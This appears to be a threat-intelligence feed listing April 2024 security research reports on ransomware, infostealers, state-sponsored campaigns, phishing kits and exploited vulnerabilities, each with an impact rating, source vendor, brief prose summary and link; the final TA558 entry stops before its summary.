Researchers at SentinelOne have studied the ways in which ransomware affiliates have changed over time, concentrating on how they are increasingly utilizing stolen data to make extra money on top of the initial ransom demands. The research looks at current examples that shed light on the growing field of cyber extortion, such as the cooperation between affiliates and groups like Dispossessor, Rabbit Hole, and RansomHub.
Source: https://www.sentinelone.com/blog/ransomware-evolution-how-cheated-affiliates-are-recycling-victim-data-for-profit/
2024-04-25
A_Sophisticated_Anti_Analysis_Info_Stealer_Named_Fletchen_Stealer
LOW
Intel Source:
CYFIRMA Research
Intel Name:
A_Sophisticated_Anti_Analysis_Info_Stealer_Named_Fletchen_Stealer
Date of Scan:
2024-04-25
Impact:
LOW
Summary:
CYFIRMA researchers identified an information stealer called Fletchen Stealer, a malware designed with sophisticated anti-analysis tactics and sold as a service by its maker, posing a huge cybersecurity concern. The study investigates the variety of anti-analysis strategies used by threat actors to mask the true nature of the malware through in-depth analysis.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_fletchen-stealer-activity-7189234450000445440-V2lj?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
2024-04-24
Cookie_hijacking_analysis
LOW
Intel Source:
Sucuri
Intel Name:
Cookie_hijacking_analysis
Date of Scan:
2024-04-24
Impact:
LOW
Summary:
Cesar Anjos, a malware researcher at Sucuri, wrote on Sucuri's blog about why it’s important to understand what cookie hijacking is, when and how it occurs, and how to protect yourself and your website against it. Cookies often hold sensitive information, including session tokens that authenticate users to a web application. By hijacking cookies, attackers can impersonate users and gain unauthorized access to private accounts and sensitive data.
Source: https://blog.sucuri.net/2024/04/what-is-cookie-hijacking.html
2024-04-24
A_few_new_publications_to_NPM_campaign
LOW
Intel Source:
Phylum
Intel Name:
A_few_new_publications_to_NPM_campaign
Date of Scan:
2024-04-24
Impact:
LOW
Summary:
Recently, the Phylum Research Team detected and flagged a few new npm publications belonging to this previously tracked campaign, with some changes from earlier packages.
Source: https://blog.phylum.io/north-korean-state-actors/
2024-04-24
Cracking_Down_Grandoreiro_Banking_Trojan
LOW
Intel Source:
Trend Micro
Intel Name:
Cracking_Down_Grandoreiro_Banking_Trojan
Date of Scan:
2024-04-24
Impact:
LOW
Summary:
This month, the Trend Micro Intel team discussed their contributions to an Interpol-coordinated operation that helped Brazilian and Spanish law enforcement agencies analyze malware samples of the Grandoreiro banking trojan. Grandoreiro spreads through phishing emails, malicious attachments, or links leading to fake websites. These emails often mimic legitimate organizations, such as banks or financial institutions, to trick users into downloading and executing the malware.
Source: https://www.trendmicro.com/en_us/research/24/d/trend-micro-collaborated-with-interpol-in-cracking-down-grandore.html
2024-04-24
An_Infostealer_strain_made_with_Electron
LOW
Intel Source:
ASEC
Intel Name:
An_Infostealer_strain_made_with_Electron
Date of Scan:
2024-04-24
Impact:
LOW
Summary:
ASEC has observed a new Infostealer strain made with Electron. Electron is a framework that lets one develop apps using JavaScript, HTML, and CSS. Discord and Microsoft VSCode are major examples of applications made with Electron. The threat actor in this attack case applied this installer format to the malware.
Source: https://asec.ahnlab.com/en/64445/
2024-04-24
DragonForce_Ransomware_is_linked_to_a_Lockbit_Builder
MEDIUM
Intel Source:
Cyble
Intel Name:
DragonForce_Ransomware_is_linked_to_a_Lockbit_Builder
Date of Scan:
2024-04-24
Impact:
MEDIUM
Summary:
Cyble Labs identified a DragonForce ransomware binary based on LOCKBIT Black ransomware, suggesting the threat actors behind DragonForce used a leaked builder of LOCKBIT Black ransomware to generate their binary.
Source: https://cyble.com/blog/lockbit-blacks-legacy-unraveling-the-dragonforce-ransomware-connection/
2024-04-24
Attacks_on_Indian_Government_Are_Increasing_by_Pakistani_APTs
MEDIUM
Intel Source:
Seqrite Labs
Intel Name:
Attacks_on_Indian_Government_Are_Increasing_by_Pakistani_APTs
Date of Scan:
2024-04-24
Impact:
MEDIUM
Summary:
Researchers at Seqrite Labs have uncovered several cyberattack operations in which they have detected the use of different remote access tools (RATs), such as AllaKore RAT and Crimson RAT. They explore the mechanics of these attacks, the actions of the attackers, and the features of the malicious software that is employed. The report also discusses the increase of cyberattacks by Pakistan-affiliated Advanced Persistent Threat (APT) groups, namely SideCopy and APT36 (Transparent Tribe), against Indian government institutions.
Source: https://www.seqrite.com/blog/pakistani-apts-escalate-attacks-on-indian-gov-seqrite-labs-unveils-threats-and-connections/
2024-04-23
Spearheading_the_Opposition_to_GuptiMiner
MEDIUM
Intel Source:
Avast
Intel Name:
Spearheading_the_Opposition_to_GuptiMiner
Date of Scan:
2024-04-23
Impact:
MEDIUM
Summary:
Avast Labs researchers have recently uncovered "GuptiMiner," a highly sophisticated malware operation that specifically targets corporate networks. They discovered that GuptiMiner secretly penetrated business networks to deliver its harmful payloads by taking advantage of a flaw in the eScan antivirus update procedure. Their team worked closely with India CERT and eScan to fix this issue, protecting a great number of users from possible harm.
Source: https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/
2024-04-23
Double_Agents_of_Malicious_Python_Packages
LOW
Intel Source:
Cert.at
Intel Name:
Double_Agents_of_Malicious_Python_Packages
Date of Scan:
2024-04-23
Impact:
LOW
Summary:
Researcher Kamil Mankowski continued his journey tracking malicious Python packages used by Oak-Grabber-V2 and provided his analysis on it.
Source: https://cert.at/en/blog/2024/4/double-agents-and-user-agents-navigating-the-realm-of-malicious-python-packages
2024-04-23
CoralRaider_threat_actor_continues_to_expand_its_activity
MEDIUM
Intel Source:
Talos
Intel Name:
CoralRaider_threat_actor_continues_to_expand_its_activity
Date of Scan:
2024-04-23
Impact:
MEDIUM
Summary:
Back in February Cisco Talos observed a new ongoing campaign which was operated by a threat actor who distributed three famous infostealer malware, including Cryptbot, LummaC2, and Rhadamanthys. This time researchers discovered a new PowerShell command-line argument embedded in the LNK file to bypass anti-virus products and download the final payload into the victims’ host.
Source: https://blog.talosintelligence.com/suspected-coralraider-continues-to-expand-victimology-using-three-information-stealers/
2024-04-23
Muddywater_campaign_continues_abusing_Atera_Agents
MEDIUM
Intel Source:
Harfanglab
Intel Name:
Muddywater_campaign_continues_abusing_Atera_Agents
Date of Scan:
2024-04-23
Impact:
MEDIUM
Summary:
Harfanglab's report details an ongoing campaign by the Iranian state-sponsored threat actor MuddyWater that has been actively exploiting the legitimate remote monitoring and management (RMM) tool Atera Agent since late 2023. The group has been relying on Atera's free trial offers to generate agents registered with compromised email accounts, enabling them to establish remote access to targeted systems without setting up their own infrastructure. The campaign has targeted various sectors across multiple countries through spearphishing emails distributing the malicious Atera Agent installers.
Source: https://harfanglab.io/en/insidethelab/muddywater-rmm-campaign/
2024-04-23
Forest_Blizzards_GooseEgg_strategic_threat
LOW
Intel Source:
Malware News
Intel Name:
Forest_Blizzards_GooseEgg_strategic_threat
Date of Scan:
2024-04-23
Impact:
LOW
Summary:
Microsoft Threat Intelligence reveals the clandestine operations of Forest Blizzard, a threat actor group affiliated with the Russian GRU, utilizing the GooseEgg tool to exploit vulnerabilities in the Windows Print Spooler service. Forest Blizzard's strategic targets include government, energy, transportation, and NGO sectors across the US, Europe, and the Middle East.
Source: https://malware.news/t/analyzing-forest-blizzard-s-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/81126
2024-04-22
The_APT_group_ToddyCat_compromise_infrustructure
LOW
Intel Source:
Securelist
Intel Name:
The_APT_group_ToddyCat_compromise_infrustructure
Date of Scan:
2024-04-22
Impact:
LOW
Summary:
This month, Securelist researchers investigated how the attackers gained persistent access to compromised infrastructure, what information on the hosts they are interested in, and what tools they used to obtain it. ToddyCat is a threat actor group that generally targets governmental organizations located in the Asia-Pacific region. The group’s main goal is to steal sensitive information from hosts.
Source: https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/
2024-04-22
Microsoft_Defender_Exposes_Kubernetes_Vulnerabilities
LOW
Intel Source:
Microsoft
Intel Name:
Microsoft_Defender_Exposes_Kubernetes_Vulnerabilities
Date of Scan:
2024-04-22
Impact:
LOW
Summary:
Microsoft Defender recently identified a significant attack targeting Kubernetes workloads leveraging critical vulnerabilities in OpenMetadata for cryptomining. Exploiting flaws disclosed on March 15, 2024, attackers gained access to Kubernetes clusters, executed reconnaissance commands, and deployed cryptomining malware. Microsoft recommends updating OpenMetadata to version 1.3.1 or later, provides guidance for vulnerability checks, and highlights the role of Defender for Cloud in detecting and mitigating such threats, underlining the importance of proactive security measures in containerized environments.
Source: https://www.microsoft.com/en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/
2024-04-22
Sandworm_Groups_Cyber_Scheme
LOW
Intel Source:
CERT-UA
Intel Name:
Sandworm_Groups_Cyber_Scheme
Date of Scan:
2024-04-22
Impact:
LOW
Summary:
Researchers at CERT-UA found that the Sandworm group planned to disrupt almost 20 critical facilities in March 2024, targeting the information and control systems that manage energy, water, and heat supply in different regions of Ukraine. CERT-UA also found that three supply chains were compromised, either through vulnerable software or because supplier employees had access to the systems.
Source: https://cert.gov.ua/article/6278706
2024-04-22
Detecting_DLL_Sideloading_Techniques
MEDIUM
Intel Source:
Securonix Threat Lab
Intel Name:
Detecting_DLL_Sideloading_Techniques
Date of Scan:
2024-04-22
Impact:
MEDIUM
Summary:
In this article, Securonix Threat Lab took a deeper dive into the prevalent “DLL sideloading” attack technique they have been observing in real-world attacks, including many they discovered, to understand its variations, how it works, and how it can be detected.
Source: https://www.securonix.com/blog/detecting-dll-sideloading-techniques-in-malware-attack-chains/
2024-04-22
Phishing_attacks_mimicking_Korean_portal_login_pages
LOW
Intel Source:
Ethical-Empire
Intel Name:
Phishing_attacks_mimicking_Korean_portal_login_pages
Date of Scan:
2024-04-22
Impact:
LOW
Summary:
Researchers from Ethical-Empire spotted phishing attacks copying Korean portal login pages, targeting various Korean portals, logistics brands, and webmail services. The fake login screens closely resembled the legitimate sites, making them difficult to distinguish at first glance.
Source: https://ethical-empire.com/korean-portal-phishing-scam/
2024-04-22
The_new_malware_family_Sharp_Stealer
LOW
Intel Source:
Gdatasoftware
Intel Name:
The_new_malware_family_Sharp_Stealer
Date of Scan:
2024-04-22
Impact:
LOW
Summary:
Threat researcher Yogesh Londhe discovered a new sample called “Sharpil RAT.exe”. This non-obfuscated .NET application with simple stealer functionality led to another sample and to the new malware family “Sharp Stealer”. “Sharpil RAT.exe” is written in C#; it runs in the background and immediately attempts to establish a connection with a Telegram bot.
Source: https://www.gdatasoftware.com/blog/2024/04/37894-sharp-info-stealer
2024-04-22
FakeBat_campaign_targeting_VMware_users
LOW
Intel Source:
Threatdown
Intel Name:
FakeBat_campaign_targeting_VMware_users
Date of Scan:
2024-04-22
Impact:
LOW
Summary:
ThreatDown researchers spotted a threat actor who is responsible for multiple malvertising campaigns mimicking popular software downloads. They connected this threat actor with the distribution of stealers, often indirectly through known loaders such as FakeBat for Windows, while using Atomic Stealer for Mac. In their latest distribution wave, the threat actor is buying ads on Google Search to target VMware users.
Source: https://www.threatdown.com/blog/fakebat-campaign-continues-now-also-targeting-vmware-users/
2024-04-22
Threat_actor_Forest_Blizzard_recent_activity
MEDIUM
Intel Source:
Microsoft
Intel Name:
Threat_actor_Forest_Blizzard_recent_activity
Date of Scan:
2024-04-22
Impact:
MEDIUM
Summary:
Microsoft Threat Intelligence has investigated activity by the Russia-based threat actor Forest Blizzard (STRONTIUM), which used a custom tool to elevate privileges and steal credentials in compromised networks. Microsoft has observed this threat actor abusing GooseEgg as part of post-compromise activities against targets including Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations.
Source: https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
2024-04-22
Surge_in_Phishing_Attacks_Impersonating_Korean_Websites
MEDIUM
Intel Source:
ASEC
Intel Name:
Surge_in_Phishing_Attacks_Impersonating_Korean_Websites
Date of Scan:
2024-04-22
Impact:
MEDIUM
Summary:
AhnLab's Security Intelligence Center (ASEC) has identified a significant rise in phishing attempts mimicking Korean portal websites, logistics brands, and webmail login pages. These attacks utilize sophisticated tactics, such as replicating the appearance of legitimate websites and leveraging NoCodeForm for credential exfiltration.
Source: https://asec.ahnlab.com/en/64294/
2024-04-22
A_Malicious_PDF_File_Using_to_Deliver_Malware
LOW
Intel Source:
ISC.SANS
Intel Name:
A_Malicious_PDF_File_Using_to_Deliver_Malware
Date of Scan:
2024-04-22
Impact:
LOW
Summary:
Researchers at SANS have noted that billions of PDF files are shared on a regular basis, and that many individuals trust these files because they believe they are "read-only" and contain just "a bunch of data". In the past, PDF viewers were affected by serious vulnerabilities triggered by malformed PDF files; the Acrobat and Foxit readers in particular were each impacted at least once. Additionally, a PDF file can be rather "dynamic": it can contain embedded JavaScript, auto-open actions that cause scripts (such as PowerShell on Windows) to run, or any other kind of embedded data.
Source: https://isc.sans.edu/diary/Malicious+PDF+File+Used+As+Delivery+Mechanism/30848/
2024-04-19
Phishing_campaign_attacks_LastPass_users
LOW
Intel Source:
Ars Technica
Intel Name:
Phishing_campaign_attacks_LastPass_users
Date of Scan:
2024-04-19
Impact:
LOW
Summary:
The article discusses a recent phishing attack that targeted users of the password manager LastPass. The attack utilized a sophisticated phishing-as-a-service kit called CryptoChameleon, which provided all the resources needed to deceive even knowledgeable individuals into revealing their master passwords. The attackers used a combination of email, SMS, and voice calls to trick victims into giving up their login credentials. LastPass was just one of many sensitive services targeted by CryptoChameleon, and the attack was able to bypass multi-factor authentication. The article also mentions previous attacks on LastPass and offers tips for preventing these types of scams from succeeding.
Source: https://arstechnica.com/security/2024/04/lastpass-users-targeted-in-phishing-attacks-good-enough-to-trick-even-the-savvy/
2024-04-19
Threat_Landscape_Update_Exploits_and_Breaches
LOW
Intel Source:
picussecurity
Intel Name:
Threat_Landscape_Update_Exploits_and_Breaches
Date of Scan:
2024-04-19
Impact:
LOW
Summary:
The Red Report 2024 by Picus Security covers critical vulnerabilities exploited by threat actors, such as the PAN-OS command injection and the PuTTY SSH client vulnerability, alongside targeted attacks by groups like IntelBroker and Sandworm.
Source: https://www.picussecurity.com/resource/blog/april-19-top-threat-actors-malware-vulnerabilities-and-exploits
2024-04-19
Technical_Analysis_of_Lazarus_Groups_Sophisticated_Attack_Chain_Targeting_Asian_Individuals
LOW
Intel Source:
Avast
Intel Name:
Technical_Analysis_of_Lazarus_Groups_Sophisticated_Attack_Chain_Targeting_Asian_Individuals
Date of Scan:
2024-04-19
Impact:
LOW
Summary:
Avast's investigation uncovers a sophisticated campaign by the Lazarus group targeting individuals in Asia with fabricated job offers. The attack, employing fileless malware and multi-layered loaders, showcases advanced evasion techniques and intricate C&C communication. The involvement of the Kaolin RAT highlights the group's commitment to control and data extraction.
Source: https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams
2024-04-19
Unveiling_Ghost_Locker_2
LOW
Intel Source:
Seqrite
Intel Name:
Unveiling_Ghost_Locker_2
Date of Scan:
2024-04-19
Impact:
LOW
Summary:
Seqrite researchers have discovered two versions of the Ghost Locker ransomware during their threat hunting activities. The initial variant, written in Python, secures its presence by copying itself to the Windows Startup directory and uses AES encryption to lock files. This variant communicates with a C2 server to deliver ransom demands and exfiltrate data. The subsequent variant, developed mostly in Golang, mirrors the characteristics of the first iteration but differs in its C2 server interactions and operational procedures. Moreover, it incorporates mechanisms to evade detection and carefully selects files for encryption and data exfiltration.
Source: https://www.seqrite.com/blog/ghost-locker-2-0-the-evolving-threat-of-ransomware-as-a-service-unveiled-by-ghostsec/
2024-04-19
Security_Risks_in_OpenMetadata
LOW
Intel Source:
SOC Radar
Intel Name:
Security_Risks_in_OpenMetadata
Date of Scan:
2024-04-19
Impact:
LOW
Summary:
Researchers from Microsoft have discovered critical vulnerabilities in the OpenMetadata platform, an open-source system designed to manage metadata across various data sources. These vulnerabilities affect versions of OpenMetadata earlier than 1.3.1 and potentially allow attackers to bypass authentication and achieve Remote Code Execution (RCE).
Source: https://socradar.io/openmetadata-attackers-cryptomine-in-kubernetes/
2024-04-19
Palo_Alto_Networks_Fixes_Critical_Command_Injection_Vulnerability_in_PAN_OS_Firewall
LOW
Intel Source:
NSFOCUS
Intel Name:
Palo_Alto_Networks_Fixes_Critical_Command_Injection_Vulnerability_in_PAN_OS_Firewall
Date of Scan:
2024-04-19
Impact:
LOW
Summary:
NSFOCUS CERT has detected a critical command injection vulnerability (CVE-2024-3400) in Palo Alto Networks' PAN-OS firewall operating system. Unauthenticated attackers could exploit this flaw to execute arbitrary code with root privileges on affected firewalls. Palo Alto Networks has released security updates addressing this vulnerability, with the PoC already public and actively exploited. The CVSS score of 10.0 underscores the severity of the issue. Users are urged to upgrade to patched versions immediately.
Source: https://nsfocusglobal.com/palo-alto-networks-pan-os-command-injection-vulnerability-cve-2024-3400/
2024-04-19
The_CVE_2024_31497_PuTTY_vulnerability
LOW
Intel Source:
Stairwell
Intel Name:
The_CVE_2024_31497_PuTTY_vulnerability
Date of Scan:
2024-04-19
Impact:
LOW
Summary:
In the Stairwell blog, the analysts discuss the details of a vulnerability, CVE-2024-31497, found in the PuTTY SSH libraries by researchers at Ruhr University Bochum. It allows attackers to access private keys used in key-based authentication. The blog provides a list of potentially vulnerable software, known vulnerable hashes, and a YARA rule for detection, and mentions the importance of quickly addressing supply chain vulnerabilities. The background of the vulnerability is explained, along with a list of potentially vulnerable software not mentioned in the NIST advisory.
Source: https://stairwell.com/resources/stairwell-threat-report-vulnerable-putty-ssh-libraries-cve-2024-31497/
2024-04-19
Malicious_Attack_Targeting_Defense_Forces_of_Ukraine
MEDIUM
Intel Source:
CERT-UA
Intel Name:
Malicious_Attack_Targeting_Defense_Forces_of_Ukraine
Date of Scan:
2024-04-19
Impact:
MEDIUM
Summary:
The Government Computer Emergency Response Team of Ukraine (CERT-UA) has issued an urgent alert regarding a targeted cyber attack on a computer within the Defense Forces of Ukraine. The attack involves the distribution of a malicious file named "Support.rar" via the Signal messenger, purportedly under the guise of document submission for UN Peace Support Operations. This file contains an exploit for a WinRAR software vulnerability (CVE-2023-38831). Upon successful exploitation, a CMD file is executed, initiating PowerShell scripts associated with the COOKBOX malware.
Source: https://cert.gov.ua/article/6278620
2024-04-18
The_newly_discovered_backdoor_MadMxShell
LOW
Intel Source:
Zscaler
Intel Name:
The_newly_discovered_backdoor_MadMxShell
Date of Scan:
2024-04-18
Impact:
LOW
Summary:
Zscaler provided the details of a new backdoor, MadMxShell, discovered by ThreatLabz. The backdoor is delivered through a ZIP archive and uses obfuscated shellcodes to extract and decode an executable file. It also has a dropper stage and a final backdoor stage for collecting system information and executing commands. The backdoor communicates with its C2 server through DNS MX queries and responses, using a custom method to encode data.
Source: https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell
2024-04-18
UK_Law_Enforcement_Successfully_Takes_Down_Phishing_as_a_Service_Provider_LabHost
MEDIUM
Intel Source:
Trend Micro
Intel Name:
UK_Law_Enforcement_Successfully_Takes_Down_Phishing_as_a_Service_Provider_LabHost
Date of Scan:
2024-04-18
Impact:
MEDIUM
Summary:
UK’s Metropolitan Police Service, in collaboration with international law enforcement agencies and private industry partners, executed an operation leading to the takedown of the notorious Phishing-as-a-Service (PhaaS) provider LabHost. LabHost, also known as LabRat, had gained notoriety since its emergence in late 2021 for offering a platform facilitating phishing attacks against numerous banks and organizations worldwide. With over 2,000 criminal users and more than 40,000 fraudulent sites deployed, LabHost posed a significant threat to global cybersecurity.
Source: https://www.trendmicro.com/en_us/research/24/d/labhost-takedown.html
2024-04-18
A_wide_range_of_Akira_ransomware
HIGH
Intel Source:
CISA
Intel Name:
A_wide_range_of_Akira_ransomware
Date of Scan:
2024-04-18
Impact:
HIGH
Summary:
According to a joint advisory from the FBI, CISA, Europol's European Cybercrime Centre (EC3), and the Netherlands' National Cyber Security Centre (NCSC-NL), the Akira ransomware operation has breached the networks of over 250 organizations and raked in roughly $42 million in ransom payments. Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a
2024-04-18
Analysis_of_Pupy_RAT
LOW
Intel Source:
ASEC
Intel Name:
Analysis_of_Pupy_RAT
Date of Scan:
2024-04-18
Impact:
LOW
Summary:
ASEC researchers discovered that many threat actors are using Pupy RAT, a remote access trojan that allows them to control computers remotely and to perform actions such as stealing data and escalating their control over the system. It no longer targets only Windows computers; it is also affecting Linux systems, especially in countries like South Korea.
Source: https://asec.ahnlab.com/en/64258/
2024-04-18
Unveiling_the_DuneQuixote_Malware_Campaign
LOW
Intel Source:
Securelist
Intel Name:
Unveiling_the_DuneQuixote_Malware_Campaign
Date of Scan:
2024-04-18
Impact:
LOW
Summary:
Researchers at Securelist have discovered a new malware campaign named "DuneQuixote," specifically aimed at government organizations within the Middle East. This campaign comprises more than 30 dropper samples, each carrying a backdoor labeled "CR4T." The primary objective of this malware is to secretly infiltrate and manage compromised systems.
Source: https://securelist.com/dunequixote/112425/
2024-04-18
The_upload_of_confidential_documents_to_VirusTotal_by_OfflRouter_virus
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
The_upload_of_confidential_documents_to_VirusTotal_by_OfflRouter_virus
Date of Scan:
2024-04-18
Impact:
MEDIUM
Summary:
Recently, Cisco Talos discovered documents with some sensitive information from Ukraine. The documents had malicious VBA code, indicating they may be used as a trick to infect organizations. The virus, OfflRouter, has been known in Ukraine since 2015 and is still active on some Ukrainian organizations’ networks, based on over 100 original infected documents uploaded to VirusTotal from Ukraine and the documents’ upload dates.
Source: https://blog.talosintelligence.com/offlrouter-virus-causes-upload-confidential-documents-to-virustotal/
2024-04-18
Malvertising_Campaign_Leveraging_Google_Ads_Distributes_MadMxShell_Backdoor
MEDIUM
Intel Source:
Thehackernews
Intel Name:
Malvertising_Campaign_Leveraging_Google_Ads_Distributes_MadMxShell_Backdoor
Date of Scan:
2024-04-18
Impact:
MEDIUM
Summary:
Zscaler ThreatLabz researchers have uncovered a sophisticated malvertising campaign utilizing Google Ads to distribute a previously unknown backdoor named MadMxShell. The campaign involves the registration of multiple domains resembling legitimate IP scanner software, which are then promoted through Google Ads to target specific search keywords. Victims who visit these sites are tricked into downloading a malicious file disguised as IP scanner software. Once executed, the malware employs DLL side-loading and process hollowing techniques to infect systems, ultimately establishing a backdoor for gathering system information and performing malicious activities.
Source: https://thehackernews.com/2024/04/malicious-google-ads-pushing-fake-ip.html
2024-04-18
A_new_packed_variant_of_the_Redline_Stealer_trojan
MEDIUM
Intel Source:
McAfee
Intel Name:
A_new_packed_variant_of_the_Redline_Stealer_trojan
Date of Scan:
2024-04-18
Impact:
MEDIUM
Summary:
Recently, McAfee telemetry data showed the details of a new variant of the Redline Stealer trojan that uses Lua bytecode to perform malicious activities. It is prevalent in various regions and is distributed through GitHub. The trojan creates persistence on infected machines and communicates through HTTP, while also being able to take screenshots and steal data. McAfee also covered the analysis of the bytecode file and the techniques used by the threat actors, including creating a mutex and retrieving information from the Windows registry.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/redline-stealer-a-novel-approach/
2024-04-17
Threat_actors_FIN7_attack_the_US_Automotive
MEDIUM
Intel Source:
Blackberry
Intel Name:
Threat_actors_FIN7_attack_the_US_Automotive
Date of Scan:
2024-04-17
Impact:
MEDIUM
Summary:
Blackberry's analysts examined the threat of phishing attacks on businesses and provided recommendations for protecting against them, including a case study of a recent attack by the threat group FIN7 on a U.S. automotive company. The article suggests implementing security measures such as employee training, multi-factor authentication, and incident response plans to prevent and mitigate the impact of phishing attacks. It also provides a detailed analysis of the tactics and techniques used by FIN7 in the attack, as well as a list of indicators of compromise.
Source: https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industry
2024-04-17
Critical_Atlassian_Flaw_Exploited_to_Deploy_Linux_Variant_of_Cerber_Ransomware
MEDIUM
Intel Source:
Cado Security
Intel Name:
Critical_Atlassian_Flaw_Exploited_to_Deploy_Linux_Variant_of_Cerber_Ransomware
Date of Scan:
2024-04-17
Impact:
MEDIUM
Summary:
Researchers at Cado Security have observed threat actors using unpatched Atlassian servers to distribute the Linux version of the Cerber ransomware, also known as C3RB3R. The attacks take advantage of a significant security flaw in Atlassian Confluence Data Center and Server, tracked as CVE-2023-22518 (CVSS score: 9.1), which enables an unauthorized attacker to reset Confluence and create an administrator account.
Source: https://www.cadosecurity.com/blog/cerber-ransomware-dissecting-the-three-heads
2024-04-17
The_Peril_of_Malicious_Annotations
LOW
Intel Source:
ISC.SANS
Intel Name:
The_Peril_of_Malicious_Annotations
Date of Scan:
2024-04-17
Impact:
LOW
Summary:
ISC.SANS researchers note that PDF files, long considered "read-only" and benign, remain a potent vector for malware delivery. Despite improvements in PDF viewer security, malicious actors exploit features like annotations and clickable links to deceive users into downloading malware. The analysis delves into the intricacies of the PDF file structure, demonstrating how attackers embed clickable zones using "/Annot" keywords that link to external URLs. The provided YARA rule offers a means to detect such malicious PDF documents.
Source: https://isc.sans.edu/diary/rss/30848
2024-04-17
Cyber_Threats_Targeting_Ukraine_Defense_Forces
MEDIUM
Intel Source:
CERT-UA
Intel Name:
Cyber_Threats_Targeting_Ukraine_Defense_Forces
Date of Scan:
2024-04-17
Impact:
MEDIUM
Summary:
Researchers at CERT-UA report that in 2024 a group tracked as UAC-0184 became more active. This group attempts to steal documents and chat messages from computers used by Ukraine's Defense Forces. It often delivers malware through popular messaging apps, luring victims with fake messages about legal issues or war videos.
Source: https://cert.gov.ua/article/6278521
2024-04-17
Attacks_Using_Brute_Force_to_Attack_VPN_and_SSH_Services
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Attacks_Using_Brute_Force_to_Attack_VPN_and_SSH_Services
Date of Scan:
2024-04-17
Impact:
MEDIUM
Summary:
Researchers at Cisco Talos have recently alerted about a global increase in brute-force attacks that, as of at least March 18, 2024, are targeting a variety of devices, including web application authentication interfaces, virtual private network (VPN) services, and SSH services. All of these attacks seem to be coming from anonymizing tunnels and proxies, as well as TOR exit nodes.
Source: https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/
2024-04-17
A_Recent_Wild_Exploit_Campaign_Targets_Media_Company
LOW
Intel Source:
Forescout
Intel Name:
A_Recent_Wild_Exploit_Campaign_Targets_Media_Company
Date of Scan:
2024-04-17
Impact:
LOW
Summary:
Forescout's Vedere Labs researchers describe an exploitation campaign targeting businesses that use Fortinet FortiClient EMS installations vulnerable to CVE-2023-48788.
Source: https://www.forescout.com/blog/connectfun-new-exploit-campaign-in-the-wild-targets-media-company/
2024-04-17
Botnets_Continue_Exploiting_CVE_2023_1389
MEDIUM
Intel Source:
Fortinet
Intel Name:
Botnets_Continue_Exploiting_CVE_2023_1389
Date of Scan:
2024-04-17
Impact:
MEDIUM
Summary:
Fortinet researchers explored infection traffic patterns and botnet activity tied to CVE-2023-1389, a command injection vulnerability in the web management interface of the TP-Link Archer AX21 (AX1800) that was disclosed and patched last year and is believed to be widely exploited this month. Recently, researchers have observed multiple attacks focusing on this year-old vulnerability, involving botnets such as Moobot, Miori, the Golang-based agent “AGoent,” and a Gafgyt variant.
Source: https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread
2024-04-17
Evil_Ant_Ransomware
LOW
Intel Source:
Netskope
Intel Name:
Evil_Ant_Ransomware
Date of Scan:
2024-04-17
Impact:
LOW
Summary:
Netskope researchers shared an analysis of a new ransomware strain called Evil Ant. It targets personal folders and external drives for encryption and requires administrator privileges to function properly. It also disables Windows Defender and Task Manager, collects the victim's IP address, and uses Fernet symmetric cryptography to encrypt files.
Source: https://www.netskope.com/jp/blog/netskope-threat-coverage-evil-ant-ransomware
2024-04-16
LightSpy_campaign_returns
LOW
Intel Source:
Blackberry
Intel Name:
LightSpy_campaign_returns
Date of Scan:
2024-04-16
Impact:
LOW
Summary:
Blackberry researchers shared details of the LightSpy campaign, a mobile espionage operation targeting individuals in Southern Asia, potentially with state-sponsored involvement. The article delves into the technical details of the malware, its Chinese origins, and the advanced techniques used, and offers recommendations for individuals and organizations to protect themselves. It also discusses the campaign's return with expanded capabilities and the threat actor group behind it, and emphasizes the need for increased vigilance and robust security measures in the targeted region.
Source: https://blogs.blackberry.com/en/2024/04/lightspy-returns-renewed-espionage-campaign-targets-southern-asia-possibly-india
2024-04-16
Campaign_For_Contact_Forms_Distributes_SSLoad_Malware
LOW
Intel Source:
PaloAlto
Intel Name:
Campaign_For_Contact_Forms_Distributes_SSLoad_Malware
Date of Scan:
2024-04-16
Impact:
LOW
Summary:
Researchers at Palo Alto Networks note that the WebDAV server hosting the MSI file has stopped operating. In recent weeks they observed this campaign spreading Latrodectus malware, but the MSI linked to this specific infection chain is not Latrodectus.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-04-15-IOC-for-Contact-Forms-campaign-SSLoad-activity.txt
2024-04-16
Decoding_TA427
LOW
Intel Source:
Proofpoint
Intel Name:
Decoding_TA427
Date of Scan:
2024-04-16
Impact:
LOW
Summary:
Proofpoint researchers profiled a highly active group called TA427. The group poses as North Korea experts in fields such as education, news, and research in order to deceive other experts and infiltrate their organizations to gather valuable information. TA427 has been quite successful at this and shows no sign of stopping; it is quick to change its methods and create new personas when needed.
Source: https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering
2024-04-16
TA558_Worldwide_Attacks
MEDIUM
Intel Source:
Positive Technologies
Intel Name:
TA558_Worldwide_Attacks
Date of Scan:
2024-04-16
Impact:
MEDIUM
Summary:
